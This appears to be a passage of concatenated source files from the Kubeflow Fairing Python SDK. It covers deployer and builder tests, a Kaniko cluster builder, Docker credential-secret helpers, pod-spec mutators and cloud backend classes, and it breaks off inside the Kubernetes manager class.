GCS_PROJECT_ID = fairing.cloud.gcp.guess_project_name()
DOCKER_REGISTRY = 'gcr.io/{}'.format(GCS_PROJECT_ID)
# Dummy training function to be submitted
def train_fn(msg):
for _ in range(30):
time.sleep(0.1)
print(msg)
# Update module to work with function preprocessor
# TODO: Remove when the function preprocessor works with functions from
# other modules.
train_fn.__module__ = '__main__'
def get_tfjobs_with_labels(labels):
api_instance = client.CustomObjectsApi()
return api_instance.list_cluster_custom_object(
constants.TF_JOB_GROUP,
constants.TF_JOB_VERSION,
constants.TF_JOB_PLURAL,
label_selector=labels)
def run_submission_with_function_preprocessor(capsys, deployer="job", builder="append",
namespace="default", cleanup=False):
py_version = ".".join([str(x) for x in sys.version_info[0:3]])
base_image = 'registry.hub.docker.com/library/python:{}'.format(py_version)
if builder == 'cluster':
fairing.config.set_builder(builder, base_image=base_image, registry=DOCKER_REGISTRY,
pod_spec_mutators=[
fairing.cloud.gcp.add_gcp_credentials],
context_source=gcs_context.GCSContextSource(
namespace=namespace),
namespace=namespace)
else:
fairing.config.set_builder(
builder, base_image=base_image, registry=DOCKER_REGISTRY)
expected_result = str(uuid.uuid4())
fairing.config.set_deployer(deployer, namespace=namespace, cleanup=cleanup,
labels={'pytest-id': expected_result})
remote_train = fairing.config.fn(lambda: train_fn(expected_result))
remote_train()
captured = capsys.readouterr()
assert expected_result in captured.out
if deployer == "tfjob":
if cleanup:
assert expected_result not in str(
get_tfjobs_with_labels('pytest-id=' + expected_result))
else:
assert expected_result in str(
get_tfjobs_with_labels('pytest-id=' + expected_result))
def test_job_deployer(capsys):
run_submission_with_function_preprocessor(capsys, deployer="job")
def test_tfjob_deployer(capsys):
run_submission_with_function_preprocessor(
capsys, deployer="tfjob", namespace="kubeflow")
def test_tfjob_deployer_cleanup(capsys):
run_submission_with_function_preprocessor(capsys, deployer="tfjob",
namespace="kubeflow", cleanup=True)
def test_docker_builder(capsys):
run_submission_with_function_preprocessor(capsys, builder="docker")
def test_cluster_builder(capsys):
run_submission_with_function_preprocessor(
capsys, builder="cluster", namespace="kubeflow")
<file_sep>/kubeflow/fairing/builders/cluster/cluster.py
import logging
import uuid
from kubernetes import client
from kubeflow.fairing import utils
from kubeflow.fairing.builders.base_builder import BaseBuilder
from kubeflow.fairing.builders import dockerfile
from kubeflow.fairing.constants import constants
from kubeflow.fairing.kubernetes.manager import KubeManager
logger = logging.getLogger(__name__)
class ClusterBuilder(BaseBuilder):
"""Builds a docker image in a Kubernetes cluster.
Args:
registry (str): Required. Registry to push image to
Example: gcr.io/kubeflow-images
base_image (str): Base image to use for the image build
preprocessor (BasePreProcessor): Preprocessor to use to modify inputs
before sending them to docker build
context_source (ContextSourceInterface): context available to the
cluster build
push (bool): Whether or not to push the image to the registry
cleanup (bool): Whether or not to clean up the Kaniko build job
"""
def __init__(self,
registry=None,
image_name=constants.DEFAULT_IMAGE_NAME,
context_source=None,
preprocessor=None,
push=True,
base_image=constants.DEFAULT_BASE_IMAGE,
pod_spec_mutators=None,
namespace=None,
dockerfile_path=None,
cleanup=False):
super().__init__(
registry=registry,
image_name=image_name,
push=push,
preprocessor=preprocessor,
base_image=base_image)
self.dockerfile_path = dockerfile_path
self.manager = KubeManager()
if context_source is None:
raise RuntimeError("context_source is not specified")
self.context_source = context_source
self.pod_spec_mutators = pod_spec_mutators or []
self.namespace = namespace or utils.get_default_target_namespace()
self.cleanup = cleanup
def build(self):
logging.info("Building image using cluster builder.")
install_reqs_before_copy = self.preprocessor.is_requirements_txt_file_present()
dockerfile_path = dockerfile.write_dockerfile(
dockerfile_path=self.dockerfile_path,
path_prefix=self.preprocessor.path_prefix,
base_image=self.base_image,
install_reqs_before_copy=install_reqs_before_copy
)
self.preprocessor.output_map[dockerfile_path] = 'Dockerfile'
context_path, context_hash = self.preprocessor.context_tar_gz()
self.image_tag = self.full_image_name(context_hash)
self.context_source.prepare(context_path)
labels = {'fairing-builder': 'kaniko'}
labels['fairing-build-id'] = str(uuid.uuid1())
pod_spec = self.context_source.generate_pod_spec(
self.image_tag, self.push)
for fn in self.pod_spec_mutators:
fn(self.manager, pod_spec, self.namespace)
pod_spec_template = client.V1PodTemplateSpec(
metadata=client.V1ObjectMeta(
generate_name="fairing-builder-",
labels=labels,
namespace=self.namespace,
annotations={"sidecar.istio.io/inject": "false"},
),
spec=pod_spec
)
job_spec = client.V1JobSpec(
template=pod_spec_template,
parallelism=1,
completions=1,
backoff_limit=0,
)
build_job = client.V1Job(
api_version="batch/v1",
kind="Job",
metadata=client.V1ObjectMeta(
generate_name="fairing-builder-",
labels=labels,
),
spec=job_spec
)
created_job = client. \
BatchV1Api(). \
create_namespaced_job(self.namespace, build_job)
self.manager.log(
name=created_job.metadata.name,
namespace=created_job.metadata.namespace,
selectors=labels,
container="kaniko")
# Invoke upstream clean ups
self.context_source.cleanup()
# Cleanup build_job if requested by user
# Otherwise build_job will be cleaned up by Kubernetes GC
if self.cleanup:
logging.warning("Cleaning up job {}...".format(created_job.metadata.name))
client. \
BatchV1Api(). \
delete_namespaced_job(
created_job.metadata.name,
created_job.metadata.namespace,
body=client.V1DeleteOptions(propagation_policy='Foreground')
)
<file_sep>/kubeflow/fairing/cloud/docker.py
import logging
from kubernetes import client
from docker.utils.config import find_config_file
from base64 import b64encode
from kubeflow.fairing.constants import constants
logger = logging.getLogger(__name__)
def get_docker_secret():
try:
docker_config_file = find_config_file(config_path=None)
with open(docker_config_file, 'r') as f:
data = f.read()
data = {".dockerconfigjson": b64encode(
data.encode('utf-8')).decode("utf-8")}
docker_secret = client.V1Secret(
metadata=client.V1ObjectMeta(name=constants.DOCKER_CREDS_SECRET_NAME),
data=data,
kind="Secret",
type="kubernetes.io/dockerconfigjson"
)
return docker_secret
except Exception as e:
logger.warning("could not get docker secret: {}".format(e))
return None
def create_docker_secret(kube_manager, namespace):
try:
docker_secret = get_docker_secret()
if docker_secret:
kube_manager.create_secret(namespace, docker_secret)
except Exception as e:
logger.warning("could not create docker secret: {}".format(e))
def add_docker_credentials_if_exists(kube_manager, pod_spec, namespace):
secret_name = constants.DOCKER_CREDS_SECRET_NAME
try:
if not kube_manager.secret_exists(secret_name, namespace):
create_docker_secret(kube_manager, namespace)
if kube_manager.secret_exists(secret_name, namespace):
add_docker_credentials(kube_manager, pod_spec, namespace)
else:
logger.warning("Not able to find docker credentials secret: {}".format(secret_name))
except Exception as e:
logger.warning("could not check for secret: {}".format(e))
def add_docker_credentials(kube_manager, pod_spec, namespace):
secret_name = constants.DOCKER_CREDS_SECRET_NAME
if not kube_manager.secret_exists(secret_name, namespace):
raise ValueError("Not able to find docker credentials secret: {}".format(secret_name))
pod_spec.image_pull_secrets = [client.V1LocalObjectReference(secret_name)]
<file_sep>/examples/prediction/requirements.txt
pandas
joblib
numpy
xgboost
scikit-learn>=0.21.0
seldon-core
tornado>=6.0.3
<file_sep>/setup.py
import setuptools
with open('requirements.txt') as f:
REQUIRES = f.read().splitlines()
setuptools.setup(
name='kubeflow-fairing',
version='0.6.0',
author="<NAME>",
author_email='<EMAIL>',
license="Apache License Version 2.0",
description="Kubeflow Fairing Python SDK.",
long_description="Python SDK for Kubeflow Fairing components.",
url="https://github.com/kubeflow/fairing",
packages=setuptools.find_packages(
include=("kubeflow*", "containerregistry*",)),
package_data={},
include_package_data=False,
zip_safe=False,
classifiers=(
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
),
install_requires=REQUIRES,
extras_require={
'dev': [
'pytest',
'pytest-pep8',
'pytest-cov'
]
}
)
<file_sep>/kubeflow/fairing/kubernetes/utils.py
from kubernetes import client
from kubernetes.client.models.v1_resource_requirements import V1ResourceRequirements
from kubeflow.fairing.constants import constants
def get_resource_mutator(cpu=None, memory=None):
"""The mutator for getting the resource setting for pod spec.
The useful example:
https://github.com/kubeflow/fairing/blob/master/examples/train_job_api/main.ipynb
:param cpu: Limits and requests for CPU resources (Default value = None)
:param memory: Limits and requests for memory (Default value = None)
:returns: object: The mutator function for setting cpu and memory in pod spec.
"""
def _resource_mutator(kube_manager, pod_spec, namespace): #pylint:disable=unused-argument
if cpu is None and memory is None:
return
if pod_spec.containers and len(pod_spec.containers) >= 1:
# All cloud providers specify their instance memory in GB,
# so it is preferable for the user to specify memory in GB;
# we convert it to the Gi unit that K8s expects
limits = {}
if cpu:
limits['cpu'] = cpu
if memory:
memory_gib = "{}Gi".format(round(memory/1.073741824, 2))
limits['memory'] = memory_gib
if pod_spec.containers[0].resources:
# Reset any existing limits (also handles the case where limits is None)
pod_spec.containers[0].resources.limits = {}
for k, v in limits.items():
pod_spec.containers[0].resources.limits[k] = v
else:
pod_spec.containers[0].resources = V1ResourceRequirements(limits=limits)
return _resource_mutator
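# Example usage (a sketch; the values are illustrative):
#   mutator = get_resource_mutator(cpu=2, memory=4)  # 4 GB becomes limits {'cpu': 2, 'memory': '3.73Gi'}
#   # Pass [mutator] as pod_spec_mutators to a builder or deployer so it is applied to the pod spec.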
def mounting_pvc(pvc_name, pvc_mount_path=constants.PVC_DEFAULT_MOUNT_PATH):
"""The function for pod_spec_mutators to mount persistent volume claim.
:param pvc_name: The name of persistent volume claim
:param pvc_mount_path: Path that the persistent volume claim is mounted to.
:returns: object: function that mounts the pvc into pods.
"""
mounting_name = str(constants.PVC_DEFAULT_VOLUME_NAME) + pvc_name
def _mounting_pvc(kube_manager, pod_spec, namespace): #pylint:disable=unused-argument
volume_mount = client.V1VolumeMount(
name=mounting_name, mount_path=pvc_mount_path)
if pod_spec.containers[0].volume_mounts:
pod_spec.containers[0].volume_mounts.append(volume_mount)
else:
pod_spec.containers[0].volume_mounts = [volume_mount]
volume = client.V1Volume(
name=mounting_name,
persistent_volume_claim=client.V1PersistentVolumeClaimVolumeSource(claim_name=pvc_name))
if pod_spec.volumes:
pod_spec.volumes.append(volume)
else:
pod_spec.volumes = [volume]
return _mounting_pvc
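# Example usage (a sketch; the claim name and mount path are illustrative):
#   mutator = mounting_pvc("my-claim", pvc_mount_path="/mnt/data")
#   # Pass [mutator] as pod_spec_mutators to mount the claim into deployed pods.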
<file_sep>/tests/unit/preprocessors/test_converted_notebook_preprocessor.py
import tarfile
import os
import posixpath
from pathlib import Path
from kubeflow.fairing.preprocessors.converted_notebook import ConvertNotebookPreprocessor
from kubeflow.fairing.preprocessors.converted_notebook import ConvertNotebookPreprocessorWithFire
from kubeflow.fairing.preprocessors.converted_notebook import FilterIncludeCell
from kubeflow.fairing.constants.constants import DEFAULT_DEST_PREFIX
NOTEBOOK_PATH = os.path.relpath(
os.path.join(os.path.dirname(__file__), 'test_notebook.ipynb'))
CONVERTED_NOTEBOOK_PATH = NOTEBOOK_PATH.replace(".ipynb", ".py")
def test_preprocess():
preprocessor = ConvertNotebookPreprocessor(notebook_file=NOTEBOOK_PATH)
files = preprocessor.preprocess()
converted_notebook_path = posixpath.join(os.path.dirname(
NOTEBOOK_PATH), os.path.basename(preprocessor.executable))
os.remove(converted_notebook_path)
assert Path(converted_notebook_path) in files
def test_overwrite_file_for_multiple_runs():
preprocessor = ConvertNotebookPreprocessor(notebook_file=NOTEBOOK_PATH)
files = preprocessor.preprocess()
files_overwrite = preprocessor.preprocess()
converted_notebook_path = posixpath.join(os.path.dirname(
NOTEBOOK_PATH), os.path.basename(preprocessor.executable))
os.remove(converted_notebook_path)
assert files == files_overwrite
def test_get_command():
preprocessor = ConvertNotebookPreprocessor(notebook_file=NOTEBOOK_PATH)
preprocessor.preprocess()
command = preprocessor.get_command()
converted_notebook_path = posixpath.join(os.path.dirname(
NOTEBOOK_PATH), os.path.basename(preprocessor.executable))
conv_notebook_context_path = posixpath.join(
DEFAULT_DEST_PREFIX, converted_notebook_path)
expected_command = 'python {}'.format(conv_notebook_context_path)
os.remove(converted_notebook_path)
assert command == expected_command.split()
def test_context_tar_gz():
preprocessor = ConvertNotebookPreprocessor(notebook_file=NOTEBOOK_PATH)
context_file, _ = preprocessor.context_tar_gz()
tar = tarfile.open(context_file)
relative_path_prefix = posixpath.relpath(DEFAULT_DEST_PREFIX, "/")
converted_notebook_path = posixpath.join(os.path.dirname(
NOTEBOOK_PATH), os.path.basename(preprocessor.executable))
notebook_context_path = posixpath.join(
relative_path_prefix, converted_notebook_path)
tar_notebook = tar.extractfile(tar.getmember(notebook_context_path))
os.remove(converted_notebook_path)
assert "print('Hello World')" in tar_notebook.read().decode()
def test_filter_include_cell():
preprocessor = ConvertNotebookPreprocessor(notebook_file=NOTEBOOK_PATH,
notebook_preprocessor=FilterIncludeCell)
context_file, _ = preprocessor.context_tar_gz()
tar = tarfile.open(context_file)
relative_path_prefix = posixpath.relpath(DEFAULT_DEST_PREFIX, "/")
converted_notebook_path = posixpath.join(os.path.dirname(
NOTEBOOK_PATH), os.path.basename(preprocessor.executable))
notebook_context_path = posixpath.join(
relative_path_prefix, converted_notebook_path)
tar_notebook = tar.extractfile(tar.getmember(notebook_context_path))
tar_notebook_text = tar_notebook.read().decode()
os.remove(converted_notebook_path)
assert "print('This cell includes fairing:include-cell')" in tar_notebook_text
def test_context_tar_gz_with_fire():
preprocessor = ConvertNotebookPreprocessorWithFire(
notebook_file=NOTEBOOK_PATH)
context_file, _ = preprocessor.context_tar_gz()
tar = tarfile.open(context_file)
relative_path_prefix = posixpath.relpath(DEFAULT_DEST_PREFIX, "/")
converted_notebook_path = posixpath.join(os.path.dirname(
NOTEBOOK_PATH), os.path.basename(preprocessor.executable))
notebook_context_path = posixpath.join(
relative_path_prefix, converted_notebook_path)
tar_notebook = tar.extractfile(tar.getmember(notebook_context_path))
tar_notebook_text = tar_notebook.read().decode()
os.remove(converted_notebook_path)
assert "fire.Fire(None)" in tar_notebook_text
<file_sep>/kubeflow/fairing/backends/backends.py
import abc
import six
import sys
import logging
from kubeflow.fairing import utils
from kubeflow.fairing.builders.docker.docker import DockerBuilder
from kubeflow.fairing.builders.cluster import gcs_context
from kubeflow.fairing.builders.cluster.cluster import ClusterBuilder
from kubeflow.fairing.builders.cluster import s3_context
from kubeflow.fairing.builders.cluster import azurestorage_context
from kubeflow.fairing.builders.append.append import AppendBuilder
from kubeflow.fairing.deployers.gcp.gcp import GCPJob
from kubeflow.fairing.deployers.job.job import Job
from kubeflow.fairing.deployers.serving.serving import Serving
from kubeflow.fairing.cloud import aws
from kubeflow.fairing.cloud import azure
from kubeflow.fairing.cloud import gcp
from kubeflow.fairing.cloud import docker
from kubeflow.fairing.ml_tasks import utils as ml_tasks_utils
from kubeflow.fairing.constants import constants
from kubeflow.fairing.kubernetes.manager import KubeManager
logger = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class BackendInterface(object):
""" Backend interface.
Creating a builder instance or a deployer to be used with a traing job or a serving job
for the given backend.
And get the approriate base container or docker registry for the current environment.
"""
@abc.abstractmethod
def get_builder(self, preprocessor, base_image, registry):
"""Creates a builder instance with right config for the given backend
:param preprocessor: Preprocessor to use to modify inputs
:param base_image: Base image to use for this builder
:param registry: Registry to push image to. Example: gcr.io/kubeflow-images
:raises NotImplementedError: not implemented exception
"""
raise NotImplementedError('BackendInterface.get_builder')
@abc.abstractmethod
def get_training_deployer(self, pod_spec_mutators=None):
"""Creates a deployer to be used with a training job
:param pod_spec_mutators: list of functions that are used to mutate the pod spec,
e.g. fairing.cloud.gcp.add_gcp_credentials_if_exists.
This can be used to set things like volumes and security context.
(Default value = None)
:raises NotImplementedError: not implemented exception
"""
raise NotImplementedError('BackendInterface.get_training_deployer')
@abc.abstractmethod
def get_serving_deployer(self, model_class):
"""Creates a deployer to be used with a serving job
:param model_class: the name of the class that holds the predict function.
:raises NotImplementedError: not implemented exception
"""
raise NotImplementedError('BackendInterface.get_serving_deployer')
def get_base_contanier(self):
"""Returns the approriate base container for the current environment
:returns: base image
"""
py_version = ".".join([str(x) for x in sys.version_info[0:3]])
base_image = 'registry.hub.docker.com/library/python:{}'.format(
py_version)
return base_image
def get_docker_registry(self):
"""Returns the approriate docker registry for the current environment
:returns: None
"""
return None
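# Sketch of how a concrete backend is typically wired together (a rough example;
# the backend choice and the generate_pod_spec/deploy calls are assumptions, not
# verified usage from this file):
#   backend = KubeflowBackend()
#   builder = backend.get_builder(preprocessor, backend.get_base_contanier(),
#                                 backend.get_docker_registry())
#   builder.build()
#   deployer = backend.get_training_deployer()
#   deployer.deploy(builder.generate_pod_spec())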
class KubernetesBackend(BackendInterface):
""" Use to create a builder instance and create a deployer to be used with a traing job or
a serving job for the Kubernetes.
"""
def __init__(self, namespace=None, build_context_source=None):
if not namespace and not utils.is_running_in_k8s():
logger.warning("Can't determine namespace automatically. "
"Using 'default' namespace but recomend to provide namespace explicitly"
". Using 'default' namespace might result in unable to mount some "
"required secrets in cloud backends.")
self._namespace = namespace or utils.get_default_target_namespace()
self._build_context_source = build_context_source
def get_builder(self, preprocessor, base_image, registry, needs_deps_installation=True, # pylint:disable=arguments-differ
pod_spec_mutators=None):
"""Creates a builder instance with right config for the given Kubernetes
:param preprocessor: Preprocessor to use to modify inputs
:param base_image: Base image to use for this job
:param registry: Registry to push image to. Example: gcr.io/kubeflow-images
:param needs_deps_installation: need depends on installation(Default value = True)
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
e.g. fairing.cloud.gcp.add_gcp_credentials_if_exists
This can used to set things like volumes and security context.
(Default value =None)
"""
if not needs_deps_installation:
return AppendBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry)
elif utils.is_running_in_k8s():
return ClusterBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry,
pod_spec_mutators=pod_spec_mutators,
namespace=self._namespace,
context_source=self._build_context_source)
elif ml_tasks_utils.is_docker_daemon_exists():
return DockerBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry)
else:
# TODO (karthikv2k): Add more info on how to resolve this issue
raise RuntimeError(
"Not able to guess the right builder for this job!")
def get_training_deployer(self, pod_spec_mutators=None):
"""Creates a deployer to be used with a training job for the Kubernetes
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
(Default value = None)
:returns: job for handle all the k8s' template building for a training
"""
return Job(self._namespace, pod_spec_mutators=pod_spec_mutators)
def get_serving_deployer(self, model_class, service_type='ClusterIP', # pylint:disable=arguments-differ
pod_spec_mutators=None):
"""Creates a deployer to be used with a serving job for the Kubernetes
:param model_class: the name of the class that holds the predict function.
:param service_type: service type (Default value = 'ClusterIP')
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
(Default value = None)
"""
return Serving(model_class, namespace=self._namespace, service_type=service_type,
pod_spec_mutators=pod_spec_mutators)
class GKEBackend(KubernetesBackend):
""" Use to create a builder instance and create a deployer to be used with a traing job
or a serving job for the GKE backend.
And get the approriate docker registry for GKE.
"""
def __init__(self, namespace=None, build_context_source=None):
super(GKEBackend, self).__init__(namespace, build_context_source)
self._build_context_source = gcs_context.GCSContextSource(
namespace=self._namespace)
def get_builder(self, preprocessor, base_image, registry, needs_deps_installation=True,
pod_spec_mutators=None):
"""Creates a builder instance with right config for GKE
:param preprocessor: Preprocessor to use to modify inputs
:param base_image: Base image to use for this job
:param registry: Registry to push image to. Example: gcr.io/kubeflow-images
:param needs_deps_installation: need depends on installation(Default value = True)
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
e.g. fairing.cloud.gcp.add_gcp_credentials_if_exists
This can used to set things like volumes and security context.
(Default value =None)
"""
pod_spec_mutators = pod_spec_mutators or []
pod_spec_mutators.append(gcp.add_gcp_credentials_if_exists)
if not needs_deps_installation:
return AppendBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry)
elif (utils.is_running_in_k8s() or
not ml_tasks_utils.is_docker_daemon_exists()):
return ClusterBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry,
pod_spec_mutators=pod_spec_mutators,
namespace=self._namespace,
context_source=self._build_context_source)
elif ml_tasks_utils.is_docker_daemon_exists():
return DockerBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry)
else:
msg = ["Not able to guess the right builder for this job!"]
if KubeManager().secret_exists(constants.GCP_CREDS_SECRET_NAME, self._namespace):
msg.append("It seems you don't have permission to list/access secrets in your "
"Kubeflow cluster. We need this permission in order to build a docker "
"image using Kubeflow cluster. Adding Kubeneters Admin role to the "
"service account you are using might solve this issue.")
if not utils.is_running_in_k8s():
msg.append(" Also If you are using 'sudo' to access docker in your system you can"
" solve this problem by adding your username to the docker group. "
"Reference: https://docs.docker.com/install/linux/linux-postinstall/"
"#manage-docker-as-a-non-root-user You need to logout and login to "
"get change activated.")
message = " ".join(msg)
raise RuntimeError(message)
def get_training_deployer(self, pod_spec_mutators=None):
"""Creates a deployer to be used with a training job for GKE
:param pod_spec_mutators: list of functions that are used to mutate the pod spec.
(Default value = None)
:returns: a Job deployer that handles the k8s template building for training
"""
pod_spec_mutators = pod_spec_mutators or []
pod_spec_mutators.append(gcp.add_gcp_credentials_if_exists)
return Job(namespace=self._namespace, pod_spec_mutators=pod_spec_mutators)
def get_serving_deployer(self, model_class, service_type='ClusterIP',
pod_spec_mutators=None):
"""Creates a deployer to be used with a serving job for GKE
:param model_class: the name of the class that holds the predict function.
:param service_type: service type (Default value = 'ClusterIP')
:param pod_spec_mutators: list of functions that are used to mutate the pod spec.
(Default value = None)
"""
return Serving(model_class, namespace=self._namespace, service_type=service_type,
pod_spec_mutators=pod_spec_mutators)
def get_docker_registry(self):
"""Returns the approriate docker registry for GKE
:returns: docker registry
"""
return gcp.get_default_docker_registry()
class AWSBackend(KubernetesBackend):
""" Use to create a builder instance and create a deployer to be used with a traing job
or a serving job for the AWS backend.
"""
def __init__(self, namespace=None, build_context_source=None):
build_context_source = build_context_source or s3_context.S3ContextSource()
super(AWSBackend, self).__init__(namespace, build_context_source)
def get_builder(self, preprocessor, base_image, registry, needs_deps_installation=True,
pod_spec_mutators=None):
"""Creates a builder instance with right config for AWS
:param preprocessor: Preprocessor to use to modify inputs
:param base_image: Base image to use for this job
:param registry: Registry to push image to. Example: gcr.io/kubeflow-images
:param needs_deps_installation: need depends on installation(Default value = True)
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
e.g. fairing.cloud.gcp.add_gcp_credentials_if_exists
This can used to set things like volumes and security context.
(Default value =None)
"""
pod_spec_mutators = pod_spec_mutators or []
pod_spec_mutators.append(aws.add_aws_credentials_if_exists)
if aws.is_ecr_registry(registry):
pod_spec_mutators.append(aws.add_ecr_config)
aws.create_ecr_registry(registry, constants.DEFAULT_IMAGE_NAME)
return super(AWSBackend, self).get_builder(preprocessor,
base_image,
registry,
needs_deps_installation,
pod_spec_mutators)
def get_training_deployer(self, pod_spec_mutators=None):
"""Creates a deployer to be used with a training job for AWS
:param pod_spec_mutators: list of functions that are used to mutate the pod spec.
(Default value = None)
:returns: a Job deployer that handles the k8s template building for training
"""
pod_spec_mutators = pod_spec_mutators or []
pod_spec_mutators.append(aws.add_aws_credentials_if_exists)
return Job(namespace=self._namespace, pod_spec_mutators=pod_spec_mutators)
def get_serving_deployer(self, model_class, service_type='ClusterIP', # pylint:disable=arguments-differ
pod_spec_mutators=None):
"""Creates a deployer to be used with a serving job for AWS
:param model_class: the name of the class that holds the predict function.
:param service_type: service type (Default value = 'ClusterIP')
:param pod_spec_mutators: list of functions that are used to mutate the pod spec.
(Default value = None)
"""
return Serving(model_class, namespace=self._namespace, service_type=service_type,
pod_spec_mutators=pod_spec_mutators)
class AzureBackend(KubernetesBackend):
""" Use to create a builder instance and create a deployer to be used with a traing job or
a serving job for the Azure backend.
"""
def __init__(self, namespace=None, build_context_source=None):
build_context_source = (
build_context_source or azurestorage_context.StorageContextSource(namespace=namespace)
)
super(AzureBackend, self).__init__(namespace, build_context_source)
def get_builder(self, preprocessor, base_image, registry,
needs_deps_installation=True, pod_spec_mutators=None):
"""Creates a builder instance with right config for Azure
:param preprocessor: Preprocessor to use to modify inputs
:param base_image: Base image to use for this job
:param registry: Registry to push image to. Example: gcr.io/kubeflow-images
:param needs_deps_installation: need depends on installation(Default value = True)
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
e.g. fairing.cloud.gcp.add_gcp_credentials_if_exists
This can used to set things like volumes and security context.
(Default value =None)
"""
pod_spec_mutators = pod_spec_mutators or []
if not azure.is_acr_registry(registry):
raise Exception("'{}' is not an Azure Container Registry".format(registry))
pod_spec_mutators.append(azure.add_acr_config)
pod_spec_mutators.append(azure.add_azure_files)
return super(AzureBackend, self).get_builder(preprocessor,
base_image,
registry,
needs_deps_installation,
pod_spec_mutators)
class KubeflowBackend(KubernetesBackend):
"""Kubeflow backend refer to KubernetesBackend """
def __init__(self, namespace=None, build_context_source=None):
if not namespace and not utils.is_running_in_k8s():
namespace = "kubeflow"
super(KubeflowBackend, self).__init__(namespace, build_context_source)
class KubeflowGKEBackend(GKEBackend):
"""Kubeflow for GKE backend refer to GKEBackend """
def __init__(self, namespace=None, build_context_source=None):
if not namespace and not utils.is_running_in_k8s():
namespace = "kubeflow"
super(KubeflowGKEBackend, self).__init__(
namespace, build_context_source)
class KubeflowAWSBackend(AWSBackend):
"""Kubeflow for AWS backend refer to AWSBackend """
def __init__(self, namespace=None, build_context_source=None): # pylint:disable=useless-super-delegation
super(KubeflowAWSBackend, self).__init__(
namespace, build_context_source)
class KubeflowAzureBackend(AzureBackend):
"""Kubeflow for Azure backend refer to AzureBackend """
def __init__(self, namespace=None, build_context_source=None): # pylint:disable=useless-super-delegation
super(KubeflowAzureBackend, self).__init__(namespace, build_context_source)
class GCPManagedBackend(BackendInterface):
""" Use to create a builder instance and create a deployer to be used with a traing job
or a serving job for the GCP.
"""
def __init__(self, project_id=None, region=None, training_scale_tier=None):
super(GCPManagedBackend, self).__init__()
self._project_id = project_id or gcp.guess_project_name()
self._region = region or 'us-central1'
self._training_scale_tier = training_scale_tier or 'BASIC'
def get_builder(self, preprocessor, base_image, registry, needs_deps_installation=True, # pylint:disable=arguments-differ
pod_spec_mutators=None):
"""Creates a builder instance with right config for GCP
:param preprocessor: Preprocessor to use to modify inputs
:param base_image: Base image to use for this job
:param registry: Registry to push image to. Example: gcr.io/kubeflow-images
:param needs_deps_installation: need depends on installation(Default value = True)
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
e.g. fairing.cloud.gcp.add_gcp_credentials_if_exists
This can used to set things like volumes and security context.
(Default value =None)
"""
pod_spec_mutators = pod_spec_mutators or []
pod_spec_mutators.append(gcp.add_gcp_credentials_if_exists)
pod_spec_mutators.append(docker.add_docker_credentials_if_exists)
# TODO (karthikv2k): Add cloud build as the default
# once https://github.com/kubeflow/fairing/issues/145 is fixed
if not needs_deps_installation:
return AppendBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry)
elif utils.is_running_in_k8s():
return ClusterBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry,
pod_spec_mutators=pod_spec_mutators,
context_source=gcs_context.GCSContextSource(
namespace=utils.get_default_target_namespace()))
elif ml_tasks_utils.is_docker_daemon_exists():
return DockerBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry)
else:
# TODO (karthikv2k): Add more info on how to resolve this issue
raise RuntimeError(
"Not able to guess the right builder for this job!")
def get_training_deployer(self, pod_spec_mutators=None):
"""Creates a deployer to be used with a training job for GCP
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
(Default value = None)
:returns: job for handle all the k8s' template building for a training
"""
return GCPJob(self._project_id, self._region, self._training_scale_tier)
def get_serving_deployer(self, model_class, pod_spec_mutators=None): # pylint:disable=arguments-differ
"""Creates a deployer to be used with a serving job for GCP
:param model_class: the name of the class that holds the predict function.
:param service_type: service type (Default value = 'ClusterIP')
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
(Default value = None)
"""
# currently GCP serving deployer doesn't implement deployer interface
raise NotImplementedError(
"GCP managed serving is not integrated into high level API yet.")
def get_docker_registry(self):
"""Returns the approriate docker registry for GCP
:returns: docker registry
"""
return gcp.get_default_docker_registry()
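# Example usage (a minimal sketch; the project id and the preprocessor
# instance are hypothetical):
#
#   backend = GCPManagedBackend(project_id="my-project", region="us-central1")
#   builder = backend.get_builder(
#       preprocessor=my_preprocessor,
#       base_image="gcr.io/my-project/base:latest",
#       registry=backend.get_docker_registry())
#   deployer = backend.get_training_deployer()  # returns a GCPJob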
<file_sep>/kubeflow/fairing/kubernetes/manager.py
from kubernetes import client, config, watch
from kubeflow.fairing.utils import is_running_in_k8s
from kubeflow.fairing.constants import constants
import logging
logger = logging.getLogger(__name__)
MAX_STREAM_BYTES = 1024
class KubeManager(object):
"""Handles communication with Kubernetes' client."""
def __init__(self):
if is_running_in_k8s():
config.load_incluster_config()
else:
config.load_kube_config()
def create_job(self, namespace, job):
"""Creates a V1Job in the specified namespace.
:param namespace: The namespace in which to create the Job
:param job: The Job definition as a kubernetes V1Job body
:returns: object: Created Job.
"""
api_instance = client.BatchV1Api()
return api_instance.create_namespaced_job(namespace, job)
def create_tf_job(self, namespace, job):
"""Create the provided TFJob in the specified namespace.
The TFJob version is defined in TF_JOB_VERSION in fairing.constants.
That version of the TFJob CRD needs to be installed before creating the TFJob.
:param namespace: The namespace in which to create the TFJob
:param job: The JSON schema of the Resource to create
:returns: object: Created TFJob.
"""
api_instance = client.CustomObjectsApi()
try:
return api_instance.create_namespaced_custom_object(
constants.TF_JOB_GROUP,
constants.TF_JOB_VERSION,
namespace,
constants.TF_JOB_PLURAL,
job
)
except client.rest.ApiException:
